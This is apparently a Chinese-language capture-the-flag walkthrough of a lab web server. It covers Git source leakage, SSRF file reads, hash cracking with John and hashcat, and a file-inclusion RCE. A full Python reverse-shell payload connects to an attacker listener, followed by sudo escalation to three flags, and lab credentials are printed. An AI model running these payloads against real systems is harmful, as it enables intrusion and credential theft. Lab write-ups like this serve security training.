一、信息收集

1. 网段扫描
使用 nmap 进行存活主机探测:

图片1-oXTO.png

对目标进行端口扫描

图片2-WkQa.png

访问80端口

图片3-cuNC.png

对网站目录进行扫描

ScreenShot_2026-03-26_135116_358.png

发现目标网站存在 Git 源代码泄露漏洞

使用 GitHack 下载源码

git clone https://github.com/lijiejie/GitHack.git
cd GitHack
python GitHack.py http://192.168.105.104/.git/
ScreenShot_2026-03-26_140023_794.png

发现.env文件--数据库凭证

ScreenShot_2026-03-27_092006_037.png

访问 /api/admin_panel,F12 发现哈希 → bob

ScreenShot_2026-03-27_092408_688.png

二、SSRF漏洞利用

触发条件:普通用户即可

注册新账户,登录到控制台

图片4-OTua.png

点击快捷工具中的 URL 可用性检测

ScreenShot_2026-03-27_092811_303.png

file:// 协议读取

读取/etc/passwd成功

ScreenShot_2026-03-27_092950_203.png

/var/www/html/api/.htaccess → 提示

ScreenShot_2026-03-27_093040_952.png

/var/www/html/api/.htpasswd → zhangwei 哈希

ScreenShot_2026-03-27_093102_157.png

John 破解 → trustno1

ScreenShot_2026-03-27_093812_141.png

三、入口点访问

访问 /api/loader.php-->会有api认证-->输入刚刚爆破的用户名密码登录

ScreenShot_2026-03-27_094219_368.png

文件包含 + RCE 注入

payload: module=admin_panel&token=bob&exec=id 确认 RCE 可用

ScreenShot_2026-03-27_094510_619.png

反弹 Shell payload:module=admin_panel&token=bob&exec=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.105.100",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

kali 上 nc 监听 → www-data Shell

ScreenShot_2026-03-27_094939_390.png

四、获取FLAG1

路径遍历找到 flag1 的位置在 /var/www/flag1.txt

ScreenShot_2026-03-27_095426_779.png

成功拿到flag1{a3f5c8d2e91b4076bc8d5e7f21a94c3b}

五、切换用户获取FLAG2

数据库凭证 (root/R#xK9mWz$2pLnQ7v)-->使用 abyss_platform 数据库,查询 users 表

ScreenShot_2026-03-27_101141_089.png

发现 admin 哈希 + 时间戳

查看 index.php → md5($password.$ts)

使用 hashcat -m 10 d450a27a0caf3b9dcc7f03e4c492f7ac:1742900000 /usr/share/wordlists/rockyou.txt 进行破解,得到密码:dragon

切换用户su liwei 输入密码 dragon

ScreenShot_2026-03-27_101840_775.png

成功拿到 flag2{7d2e4b8c1f6a39d5e0c7b2f84a16d9e3}

六、提权获取FLAG3

通过sudo -l 查看那些是不需要输root密码就可以执行的root权限

ScreenShot_2026-03-27_102339_329.png

利用路径遍历漏洞拿到flag3

ScreenShot_2026-03-27_102531_574.png

成功拿到 flag3{b9c1d4e7f2a85036e1d8c3b6f4a27d5e}